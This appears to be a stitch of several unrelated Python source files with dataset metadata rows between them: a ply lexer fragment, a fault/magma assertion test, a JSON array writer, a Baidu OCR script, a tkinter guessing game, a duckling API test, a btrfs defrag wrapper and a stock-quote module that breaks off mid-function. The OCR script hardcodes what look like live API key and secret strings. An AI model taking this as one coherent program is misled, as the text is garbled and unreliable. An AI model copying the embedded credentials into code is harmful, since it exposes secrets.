t.value = float(t.value)
return t
def t_CONST_INT(t):
r'[0-9]+'
t.value = int(t.value)
return t
def t_CONST_STR(t):
r'\".+\"'
t.value = t.value[1:-1]
return t
def t_CONST_CHAR(t):
r'\'.+\''
t.value = t.value[1:-1]
return t
def t_NEW_LINE(t):
r'\n\s*[\t ]*'
t.lexer.lineno += t.value.count('\n')
t.value = len(t.value) - 1 - t.value.rfind('\n')
return t
def first_word(s):
whites = [' ', '\t', '\n']
low = 0
for l in s:
if l in whites:
break
low += 1
return s[0:low]
def t_error(t):
print("Unexpected \"{}\" at line {}".format(first_word(t.value), t.lexer.lineno))
grease_lexer = Indents(lex.lex())
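# Usage sketch (illustrative): assuming the Indents wrapper from
# grease.core.indents preserves the standard ply lexer interface, a snippet
# can be tokenized like this.
# grease_lexer.input('var x = 1 + 2\n')
# for tok in grease_lexer:
#     print(tok.type, tok.value)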
| 19.89916
| 85
| 0.505912
| 354
| 2,368
| 3.234463
| 0.271186
| 0.094323
| 0.052402
| 0.048035
| 0.145852
| 0.127511
| 0.127511
| 0.047162
| 0.047162
| 0.047162
| 0
| 0.009577
| 0.250422
| 2,368
| 118
| 86
| 20.067797
| 0.635493
| 0.040541
| 0
| 0.09901
| 0
| 0
| 0.226774
| 0.009291
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09901
| false
| 0
| 0.029703
| 0
| 0.19802
| 0.019802
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c2968143388eec54e35192431494447d2c82d24
| 3,673
|
py
|
Python
|
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_assert_immediate.py
|
makaimann/fault
|
8c805415f398e64971d18fbd3014bc0b59fb38b8
|
[
"BSD-3-Clause"
] | null | null | null |
import tempfile
import pytest
import fault as f
import magma as m
from fault.verilator_utils import verilator_version
@pytest.mark.parametrize('success_msg', [None, "OK"])
@pytest.mark.parametrize('failure_msg', [None, "FAILED"])
@pytest.mark.parametrize('severity', ["error", "fatal", "warning"])
@pytest.mark.parametrize('on', [None, f.posedge])
@pytest.mark.parametrize('name', [None, "my_assert"])
def test_immediate_assert(capsys, failure_msg, success_msg, severity, on,
name):
if verilator_version() < 4.0:
pytest.skip("Untested with earlier verilator versions")
if failure_msg is not None and severity == "fatal":
# Use integer exit code
failure_msg = 1
class Foo(m.Circuit):
io = m.IO(
I0=m.In(m.Bit),
I1=m.In(m.Bit)
) + m.ClockIO()
io.CLK.unused()
f.assert_immediate(~(io.I0 & io.I1),
success_msg=success_msg,
failure_msg=failure_msg,
severity=severity,
on=on if on is None else on(io.CLK),
name=name)
tester = f.Tester(Foo, Foo.CLK)
tester.circuit.I0 = 1
tester.circuit.I1 = 1
tester.step(2)
try:
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator", magma_opts={"inline": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
except AssertionError:
assert failure_msg is None or severity in ["error", "fatal"]
else:
# warning doesn't trigger exit code/failure (but only if there's a
# failure_msg, otherwise severity is ignored)
assert severity == "warning"
out, _ = capsys.readouterr()
if failure_msg is not None:
if severity == "warning":
msg = "%Warning:"
else:
msg = "%Error:"
msg += " Foo.v:29: Assertion failed in TOP.Foo"
if name is not None:
msg += f".{name}"
if severity == "error":
msg += f": {failure_msg}"
assert msg in out
tester.clear()
tester.circuit.I0 = 0
tester.circuit.I1 = 1
tester.step(2)
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator",
magma_opts={"inline": True,
"verilator_compat": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
out, _ = capsys.readouterr()
if success_msg is not None:
assert success_msg in out
def test_immediate_assert_tuple_msg(capsys):
if verilator_version() < 4.0:
pytest.skip("Untested with earlier verilator versions")
class Foo(m.Circuit):
io = m.IO(
I0=m.In(m.Bit),
I1=m.In(m.Bit)
)
f.assert_immediate(
io.I0 == io.I1,
failure_msg=("io.I0 -> %x != %x <- io.I1", io.I0, io.I1)
)
tester = f.Tester(Foo)
tester.circuit.I0 = 1
tester.circuit.I1 = 0
tester.eval()
with pytest.raises(AssertionError):
with tempfile.TemporaryDirectory() as dir_:
tester.compile_and_run("verilator", magma_opts={"inline": True},
flags=['--assert'], directory=dir_,
disp_type="realtime")
out, _ = capsys.readouterr()
msg = ("%Error: Foo.v:13: Assertion failed in TOP.Foo: io.I0 -> 1 != 0 <-"
" io.I1")
assert msg in out, out
| 34.980952
| 78
| 0.54288
| 433
| 3,673
| 4.484988
| 0.237875
| 0.056643
| 0.054068
| 0.014418
| 0.438723
| 0.415036
| 0.393409
| 0.316684
| 0.316684
| 0.316684
| 0
| 0.015977
| 0.335421
| 3,673
| 104
| 79
| 35.317308
| 0.779599
| 0.035393
| 0
| 0.373626
| 0
| 0.010989
| 0.131676
| 0
| 0
| 0
| 0
| 0
| 0.186813
| 1
| 0.021978
| false
| 0
| 0.054945
| 0
| 0.120879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c312cb7c5567e3a8e860f6d1634192c56119a38
| 2,580
|
py
|
Python
|
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
jaf/main.py
|
milano-slesarik/jaf
|
97c0a579f4ece70dbfb583d72aa35380f7a82f8d
|
[
"MIT"
] | null | null | null |
import json
import os
import typing
from io import IOBase
from jaf.encoders import JAFJSONEncoder
class JsonArrayFileWriterNotOpenError(Exception):
pass
class JsonArrayFileWriter:
MODE__APPEND_OR_CREATE = 'ac'
MODE__REWRITE_OR_CREATE = 'rc'
def __init__(self, filepath: str, mode=MODE__REWRITE_OR_CREATE, indent: typing.Optional[int] = None,
json_encoder=JAFJSONEncoder):
self.filepath: str = filepath
self.mode = mode
self.indent: typing.Optional[int] = indent
self.lines: int = 0
self.json_encoder = json_encoder
self.file: typing.Optional[IOBase] = None
def __enter__(self) -> 'JsonArrayFileWriter':
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
self.close()
def open(self) -> None:
if self.mode == self.MODE__REWRITE_OR_CREATE:
self.file = open(self.filepath, 'w')
self.file.write('[')
elif self.mode == self.MODE__APPEND_OR_CREATE:
if os.path.exists(self.filepath):
with open(self.filepath) as f:
jsn = json.load(f)  # loads the whole JSON file into memory
os.rename(self.filepath, self.filepath + '.bak')
else:
jsn = []
self.file = open(self.filepath, 'w')
self.file.write('[')
for entry in jsn:
self.write(entry)
# note: a plain append mode (without rewrite) is not implemented; unknown modes fall through to the error below
else:
raise NotImplementedError(f"Unknown write mode \"{self.mode}\"")
def write(self, dct: dict) -> None:
if getattr(self, 'file', None) is None:
raise JsonArrayFileWriterNotOpenError(
"JsonArrayFileWriter needs to be opened by calling `.open()` or used within a context manager `with JsonArrayFileWriter(<FILEPATH>,**kwargs) as writer:`")
jsn = json.dumps(dct, indent=self.indent, cls=self.json_encoder)
if self.lines:
self.file.write(',')
self.write_newline()
self.file.write(jsn)
self.lines += 1
def write_dict(self, dct: dict) -> None:
self.write(dct)
def write_newline(self):
self.file.write(os.linesep)
def close(self) -> None:
self.file.write('\n')
self.file.write(']')
self.file.close()
if __name__ == '__main__':  # guard the demo so importing this module has no side effects
with JsonArrayFileWriter('output.json', mode=JsonArrayFileWriter.MODE__APPEND_OR_CREATE, indent=4) as j:
d = {1: 2, 2: 3, 3: 4, 4: 6}
for i in range(1000000):
j.write(d)
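# Reading the emitted file back is plain JSON (a sketch; assumes the demo
# above ran to completion and closed the writer). Note that the integer keys
# in `d` come back as strings, since JSON object keys are always strings.
# with open('output.json') as f:
#     entries = json.load(f)  # -> list of dicts, e.g. entries[0]['1'] == 2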
| 31.084337
| 170
| 0.601163
| 315
| 2,580
| 4.771429
| 0.32381
| 0.063872
| 0.060546
| 0.035928
| 0.134398
| 0.085163
| 0.050566
| 0.050566
| 0.050566
| 0
| 0
| 0.009772
| 0.286047
| 2,580
| 82
| 171
| 31.463415
| 0.806189
| 0.012403
| 0
| 0.09375
| 0
| 0.015625
| 0.086803
| 0.015711
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.015625
| 0.078125
| 0
| 0.28125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3406ddfc224f8162dd8e58c6d1818f19d5fb3c
| 812
|
py
|
Python
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | 1
|
2019-01-27T04:08:05.000Z
|
2019-01-27T04:08:05.000Z
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | 5
|
2021-03-18T21:35:20.000Z
|
2022-01-13T00:58:18.000Z
|
BluePlug/fork.py
|
liufeng3486/BluePlug
|
c7c5c769ed35c71ebc542d34848d6bf309abd051
|
[
"MIT"
] | null | null | null |
from aip import AipOcr
BAIDU_APP_ID='14490756'
BAIDU_API_KEY = 'Z7ZhXtleolXMRYYGZ59CGvRl'
BAIDU_SECRET_KEY = 'zbHgDUGmRnBfn6XOBmpS5fnr9yKer8C6'
client= AipOcr(BAIDU_APP_ID, BAIDU_API_KEY, BAIDU_SECRET_KEY)
options = {}
options["recognize_granularity"] = "big"
options["language_type"] = "CHN_ENG"
options["detect_direction"] = "true"
options["detect_language"] = "true"
options["vertexes_location"] = "true"
options["probability"] = "true"
def getimagestream(path):
with open(path, 'rb') as f:
return f.read()
def getcharactor(path):
obj = client.general(getimagestream(path), options)  # pass the configured options so they take effect
if obj.get('error_code'):
return obj
res = []
for r in obj['words_result']:
res.append(r['words'])
return res
if __name__ == '__main__':
r = getcharactor('5.png')
print(r)
| 24.606061
| 62
| 0.69335
| 101
| 812
| 5.29703
| 0.564356
| 0.061682
| 0.052336
| 0.059813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025111
| 0.166256
| 812
| 33
| 63
| 24.606061
| 0.76514
| 0
| 0
| 0
| 0
| 0
| 0.276753
| 0.094711
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.038462
| 0
| 0.230769
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c36a55c48b2843a0df149d905928f2eb9279e29
| 4,596
|
py
|
Python
|
GuessGame.py
|
VedantKhairnar/Guess-Game
|
a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | null | null | null |
GuessGame.py
|
VedantKhairnar/Guess-Game
|
a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | null | null | null |
GuessGame.py
|
VedantKhairnar/Guess-Game
|
a959d03cbfea539a63e451e5c65f7cd9790d1b7f
|
[
"MIT"
] | 1
|
2020-06-05T12:42:39.000Z
|
2020-06-05T12:42:39.000Z
|
from tkinter import *
import random
from tkinter import messagebox
class GuessGame:
def protocolhandler(self):
if messagebox.askyesno("Exit", "Really Wanna stop Guessing?"):
if messagebox.askyesno("Exit", "Are you sure?"):
self.root.destroy()
def result(self):
print (" You have ran out of guesses :( i was thinking of the number: ",self.n)
lose = Label(self.root, text=" You have run out of chances :(\nand I was thinking of the number: "+str(self.n),bg='black',fg='cyan',font=5)
lose.place(x = 140,y = 500)
def check(self):
print("Checking the number provided...")
self.flag = 0
self.turn += 1
if self.turn > 10:  # self.flag was just reset, so the old flag test was always true; evaluate the 10th guess before ending the game
self.result()
return
print("Entered number is "+ str(self.m.get()))
if self.m.get()<1 or self.m.get()>100:
print("Invalid number..")
self.invalid = Label(self.root, text="Invalid number entered.. ",bg='black',fg='cyan',font=5)
self.invalid.place(x = 140,y = 503)
elif self.m.get()==self.n:
print("Bravos,You guessed it right!!! in " +str(self.turn)+" turns")
self.flag=1
self.win = Label(self.root, text="Bravos,You guessed it right!!! in " +str(self.turn)+" turns",bg='black',fg='cyan',font=5)
self.win.place(x=130,y=503)
elif self.m.get()<self.n:
print ("Too low! You have ",10-self.turn, "guesses left!")
self.less = Label(self.root, text="Too low! You have "+str(10-self.turn)+ " guesses left!",bg='black',fg='cyan',font=5)
self.less.place(x=135,y=503)
elif self.m.get()>self.n:
print ("Too high! You have ",10-self.turn, "guesses left!")
self.more = Label(self.root, text="Too high! You have "+str(10-self.turn)+ " guesses left!",bg='black',fg='cyan',font=5)
self.more.place(x=135,y=503)
else:
print("There's some problem!!!")
self.root.destroy()
def __init__(self):
self.root = Tk()
self.root.geometry('800x600')
self.root.config(bg='black')
self.root.title('Guess Game')
self.m = IntVar()
self.status = ""
self.flag = 0
self.turn=0
self.n = random.randint(1,101)
# self.root.protocol("WM_DELETE_WINDOW", self.protocolhandler)
photo = PhotoImage(file="pythonlogoneonf.png")
label = Label(self.root, image=photo,border=0)
label.place(x=300, y=300)
self.win = Label(self.root, text="Bravos,You guessed it right!!! in " +str(self.turn)+" turns",bg='black',fg='cyan')
self.more = Label(self.root, text="Too high! You have "+str(10-self.turn)+ "guesses left!",bg='black',fg='cyan')
self.less = Label(self.root, text="Too low! You have "+str(10-self.turn)+ "guesses left!",bg='black',fg='cyan')
self.invalid = Label(self.root, text="Invalid number entered.. ",bg='black',fg='cyan')
status = Label(self.root,text = "Status: ",bg='black',fg='cyan')
status.config(font=("magneto", 20))
status.place(x=17,y=495)
title_g = Label(self.root, text="G",bg='black',fg='cyan')
# title_g.config(font=("mexicanero", 50))
title_g.config(font=("prometheus", 80))
title_g.place(x=250,y=70)
title_1 = Label(self.root, text="uess",fg='cyan',bg='black')
title_1.config(font=("prometheus", 38))
title_1.place(x=350,y=70)
title_2 = Label(self.root, text="ame",fg='cyan',bg='black')
title_2.config(font=("prometheus", 38))
title_2.place(x=370,y=125)
instructions = Label(self.root, text="Instruction: I am thinking of a number from 1-100..\nGuess it with the directions I'll provide.\nYou have 10 chances in total\nGood Luck\n:)",bg='black',fg='cyan')
instructions.config(font=("calibri", 13))
instructions.place(x=220,y=350)
guess = Label(self.root, text="Enter Your Guess here:",bg='black',fg='cyan')
guess.config(font=("fragmentcore", 13))
guess.place(x=23,y=290)
self.entry = Entry(self.root,textvariable=self.m,bg='black',fg='cyan')
self.entry.place(x=205,y=293)
button_push = Button(self.root, text="Check",bd=4,bg='black',fg='cyan', command=self.check)
button_push.place(x=350,y=285)
self.root.mainloop()
s = GuessGame()
| 42.555556
| 210
| 0.570061
| 653
| 4,596
| 3.984686
| 0.255743
| 0.079939
| 0.079939
| 0.098002
| 0.408916
| 0.330899
| 0.306303
| 0.299385
| 0.277863
| 0.267871
| 0
| 0.043223
| 0.260009
| 4,596
| 107
| 211
| 42.953271
| 0.721847
| 0.021758
| 0
| 0.049383
| 0
| 0.012346
| 0.250399
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.037037
| 0
| 0.111111
| 0.098765
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3a5c531bfcc3cf9b1021a5ea94cb71ba7d11b0
| 1,268
|
py
|
Python
|
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | 1
|
2020-03-08T07:46:14.000Z
|
2020-03-08T07:46:14.000Z
|
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | null | null | null |
duckling/test/test_api.py
|
handsomezebra/zoo
|
db9ef7f9daffd34ca859d5a4d76d947e00a768b8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import json
import requests
import logging
import csv
url = "http://localhost:10000/parse"
def get_result(text, lang, dims, latent=None, reftime=None, tz=None):
data = {
"text": text,
"lang": lang,
"dims": json.dumps(dims)
}
if reftime is not None:
data["reftime"] = reftime
if tz is not None:
data["tz"] = tz
if latent is not None:
data["latent"] = latent
response = None
try:
response = requests.post(url, data=data)
response.raise_for_status()
except requests.exceptions.RequestException as e:
logging.warning("Service %s requests exception: %s", url, e)
if response is None:
logging.warning("Failed to call service")
return None
elif response.status_code != 200:
logging.warning("Invalid response code %d from service", response.status_code)
return None
else:
return response.json()
def test_time_en():
reftime = "1559920354000" # 6/7/2019 8:12:34 AM
time_zone = "America/Los_Angeles"
result = get_result("tomorrow at eight", "en", ["time"], reftime=reftime)
assert result is not None and result[0]["value"]["value"] == "2019-06-08T08:00:00.000-07:00"
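# This test requires the duckling HTTP service to be listening on
# localhost:10000 (see `url` above). A direct-run sketch outside pytest
# (hypothetical convenience, not part of the original file):
# if __name__ == '__main__':
#     test_time_en()
#     print("test_time_en passed")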
| 23.924528
| 96
| 0.621451
| 169
| 1,268
| 4.60355
| 0.473373
| 0.041131
| 0.046272
| 0.050129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058017
| 0.252366
| 1,268
| 52
| 97
| 24.384615
| 0.762658
| 0.032334
| 0
| 0.055556
| 0
| 0
| 0.196895
| 0.023693
| 0
| 0
| 0
| 0
| 0.027778
| 1
| 0.055556
| false
| 0
| 0.111111
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3b9d3f39b8361cf623581c59d5c7de855eb076
| 943
|
py
|
Python
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | 3
|
2020-10-30T12:18:42.000Z
|
2022-02-06T20:17:55.000Z
|
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
btrfslime/defrag/btrfs.py
|
tsangwpx/btrfslime
|
49c141721c532706f146fea31d2eb171c6dd698b
|
[
"MIT"
] | null | null | null |
from __future__ import annotations
import os
import subprocess
from typing import AnyStr
from ..util import check_nonnegative
BTRFS_BIN = '/bin/btrfs'
def file_defrag(
target: AnyStr,
start: int = None,
size: int = None,
extent_size: int = None,
*,
flush=False,
btrfs_bin=BTRFS_BIN,
):
if isinstance(target, bytes):
target = os.fsdecode(target)
defrag_args = [btrfs_bin, 'filesystem', 'defrag']
if start is not None:
check_nonnegative('start', start)
defrag_args.extend(('-s', str(start)))
if size is not None:
check_nonnegative('size', size)
defrag_args.extend(('-l', str(size)))
if extent_size is not None:
check_nonnegative('extent_size', extent_size)
defrag_args.extend(('-t', str(extent_size)))
if flush:
defrag_args.append('-f')
defrag_args.append(os.fspath(target))
subprocess.check_call(defrag_args)
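# Example invocation (a sketch; the path and the 32 MiB target extent size are
# illustrative only, and defragmenting requires a btrfs filesystem plus
# sufficient privileges):
# file_defrag('/srv/data/big.img', extent_size=32 * 1024 * 1024, flush=True)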
| 21.930233
| 53
| 0.652174
| 122
| 943
| 4.827869
| 0.336066
| 0.118846
| 0.04584
| 0.071307
| 0.140917
| 0.098472
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230117
| 943
| 42
| 54
| 22.452381
| 0.811295
| 0
| 0
| 0
| 0
| 0
| 0.057264
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.16129
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3ddb0feb36d17a1b33c822d86fc630d77ff009
| 14,771
|
py
|
Python
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | 1
|
2018-04-03T06:25:24.000Z
|
2018-04-03T06:25:24.000Z
|
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
fooltrader/api/quote.py
|
lcczz/fooltrader
|
fb43d9b2ab18fb758ca2c629ad5f7ba1ea873a0e
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
import logging
import os
from ast import literal_eval
import numpy as np
import pandas as pd
from fooltrader.consts import CHINA_STOCK_INDEX, USA_STOCK_INDEX
from fooltrader.contract import data_contract
from fooltrader.contract import files_contract
from fooltrader.contract.files_contract import get_kdata_dir, get_kdata_path
from fooltrader.settings import US_STOCK_CODES
from fooltrader.utils.utils import get_file_name, to_time_str
logger = logging.getLogger(__name__)
def convert_to_list_if_need(input):
if input and "[" in input:
return literal_eval(input)
else:
return input
# meta
def get_security_list(security_type='stock', exchanges=['sh', 'sz'], start=None, end=None,
mode='simple', start_date=None, codes=None):
"""
get security list.
Parameters
----------
security_type : str
{'stock', 'future'}, default: 'stock'
exchanges : list
['sh', 'sz','nasdaq','nyse','amex'],default: ['sh','sz']
start : str
the start code,default:None
only works when exchanges is ['sh','sz']
end : str
the end code,default:None
only works when exchanges is ['sh','sz']
mode : str
whether parse more security info,{'simple','es'},default:'simple'
start_date : Timestamp str or Timestamp
the filter for start list date,default:None
codes : list
the exact codes to query,default:None
Returns
-------
DataFrame
the security list
"""
if security_type == 'stock':
df = pd.DataFrame()
df_usa = pd.DataFrame()
for exchange in exchanges:
the_path = files_contract.get_security_list_path(security_type, exchange)
if os.path.exists(the_path):
if exchange == 'sh' or exchange == 'sz':
if mode == 'simple':
df1 = pd.read_csv(the_path,
converters={'code': str})
else:
df1 = pd.read_csv(the_path,
converters={'code': str,
'sinaIndustry': convert_to_list_if_need,
'sinaConcept': convert_to_list_if_need,
'sinaArea': convert_to_list_if_need})
df = df.append(df1, ignore_index=True)
elif exchange == 'nasdaq':
df_usa = pd.read_csv(the_path, dtype=str)
elif security_type == 'index':
df = pd.DataFrame(CHINA_STOCK_INDEX)
df_usa = pd.DataFrame()
if 'nasdaq' in exchanges:
df_usa = pd.DataFrame(USA_STOCK_INDEX)
if df.size > 0:
if start:
df = df[df["code"] >= start]  # start is the lower bound on the code
if end:
df = df[df["code"] <= end]  # end is the upper bound on the code
if start_date:
df['listDate'] = pd.to_datetime(df['listDate'])
df = df[df['listDate'] >= pd.Timestamp(start_date)]
df = df.set_index(df['code'], drop=False)
if df_usa.size > 0:
df_usa = df_usa.set_index(df_usa['code'], drop=False)
if codes:
df_usa = df_usa.loc[codes]
df = df.append(df_usa, ignore_index=True)
return df
def _get_security_item(code=None, id=None, the_type='stock'):
"""
get the security item.
Parameters
----------
code : str
the security code,default: None
id : str
the security id,default: None
the_type : str
the security type
Returns
-------
DataFrame
the security item
"""
df = get_security_list(security_type=the_type)
if id:
df = df.set_index(df['id'])
return df.loc[id,]
if code:
df = df.set_index(df['code'])
return df.loc[code,]
def to_security_item(security_item):
if type(security_item) == str:
if 'stock' in security_item:
security_item = _get_security_item(id=security_item, the_type='stock')
elif 'index' in security_item:
security_item = _get_security_item(id=security_item, the_type='index')
else:
security_item = _get_security_item(code=security_item)
return security_item
# tick
def get_ticks(security_item, the_date=None, start=None, end=None):
"""
get the ticks.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the tick for the exact date
start : TimeStamp str or TimeStamp
start date
end: TimeStamp str or TimeStamp
end date
Yields
-------
DataFrame
"""
security_item = to_security_item(security_item)
if the_date:
tick_path = files_contract.get_tick_path(security_item, the_date)
yield _parse_tick(tick_path, security_item)
else:
tick_dir = files_contract.get_tick_dir(security_item)
if start or end:
if not start:
start = security_item['listDate']
if not end:
end = datetime.datetime.today()
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir) if
get_file_name(f) in pd.date_range(start=start, end=end)]
else:
tick_paths = [os.path.join(tick_dir, f) for f in
os.listdir(tick_dir)]
for tick_path in sorted(tick_paths):
yield _parse_tick(tick_path, security_item)
def _parse_tick(tick_path, security_item):
if os.path.isfile(tick_path):
df = pd.read_csv(tick_path)
df['timestamp'] = get_file_name(tick_path) + " " + df['timestamp']
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df['code'] = security_item['code']
df['securityId'] = security_item['id']
return df
def get_available_tick_dates(security_item):
dir = files_contract.get_tick_dir(security_item)
return [get_file_name(f) for f in os.listdir(dir)]
# kdata
def get_kdata(security_item, the_date=None, start_date=None, end_date=None, fuquan='bfq', dtype=None, source='163',
level='day'):
"""
get kdata.
Parameters
----------
security_item : SecurityItem or str
the security item,id or code
the_date : TimeStamp str or TimeStamp
get the kdata for the exact date
start_date : TimeStamp str or TimeStamp
start date
end_date : TimeStamp str or TimeStamp
end date
fuquan : str
{"qfq","hfq","bfq"},default:"bfq"
dtype : type
the data type for the csv column,default: None
source : str
the data source,{'163','sina'},default: '163'
level : str or int
the kdata level,{1,5,15,30,60,'day','week','month'},default : 'day'
Returns
-------
DataFrame
"""
security_item = to_security_item(security_item)
# 163's data is already merged and includes the adjustment factor; it all lives under the 'bfq' directory, so we only need to read from one place and convert accordingly
if source == '163':
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan='bfq')
else:
the_path = files_contract.get_kdata_path(security_item, source=source, fuquan=fuquan)
if os.path.isfile(the_path):
if not dtype:
dtype = {"code": str, 'timestamp': str}
df = pd.read_csv(the_path, dtype=dtype)
df.timestamp = df.timestamp.apply(lambda x: to_time_str(x))
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
if the_date:
if the_date in df.index:
return df.loc[the_date]
else:
return pd.DataFrame()
if not start_date:
if security_item['type'] == 'stock':
if type(security_item['listDate']) != str and np.isnan(security_item['listDate']):
start_date = '2002-01-01'
else:
start_date = security_item['listDate']
else:
start_date = datetime.datetime.today() - datetime.timedelta(days=30)
if not end_date:
end_date = datetime.datetime.today()
if start_date and end_date:
df = df.loc[start_date:end_date]
#
if source == '163' and security_item['type'] == 'stock':
if fuquan == 'bfq':
return df
if 'factor' in df.columns:
current_factor = df.tail(1).factor.iat[0]
# hfq (backward-adjusted) prices do not change
df.close *= df.factor
df.open *= df.factor
df.high *= df.factor
df.low *= df.factor
if fuquan == 'qfq':
# qfq (forward-adjusted) prices must be computed backwards from the latest factor
df.close /= current_factor
df.open /= current_factor
df.high /= current_factor
df.low /= current_factor
return df
return pd.DataFrame()
def get_latest_download_trading_date(security_item, return_next=True, source='163'):
df = get_kdata(security_item, source=source)
if len(df) == 0:
return pd.Timestamp(security_item['listDate'])
if return_next:
return df.index[-1] + pd.DateOffset(1)
else:
return df.index[-1]
def get_trading_dates(security_item, dtype='list', ignore_today=False, source='163', fuquan='bfq'):
df = get_kdata(security_item, source=source, fuquan=fuquan)
if dtype == 'list' and len(df.index) > 0:
dates = df.index.strftime('%Y-%m-%d').tolist()
if ignore_today:
dates = [the_date for the_date in dates if the_date != datetime.datetime.today().strftime('%Y-%m-%d')]
return dates
return dates
return df.index
def kdata_exist(security_item, year, quarter, fuquan=None, source='163'):
df = get_kdata(security_item, fuquan=fuquan, source=source)
if "{}Q{}".format(year, quarter) in df.index:
return True
return False
# TODO:use join
def merge_to_current_kdata(security_item, df, fuquan='bfq'):
df = df.set_index(df['timestamp'], drop=False)
df.index = pd.to_datetime(df.index)
df = df.sort_index()
df1 = get_kdata(security_item, source='sina', fuquan=fuquan, dtype=str)
df1 = df1.append(df)
df1 = df1.drop_duplicates(subset='timestamp', keep='last')
df1 = df1.sort_index()
the_path = files_contract.get_kdata_path(security_item, source='sina', fuquan=fuquan)
df1.to_csv(the_path, index=False)
def time_index_df(df):
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
return df
def add_factor_to_163(security_item):
path_163 = get_kdata_path(security_item, source='163', fuquan='bfq')
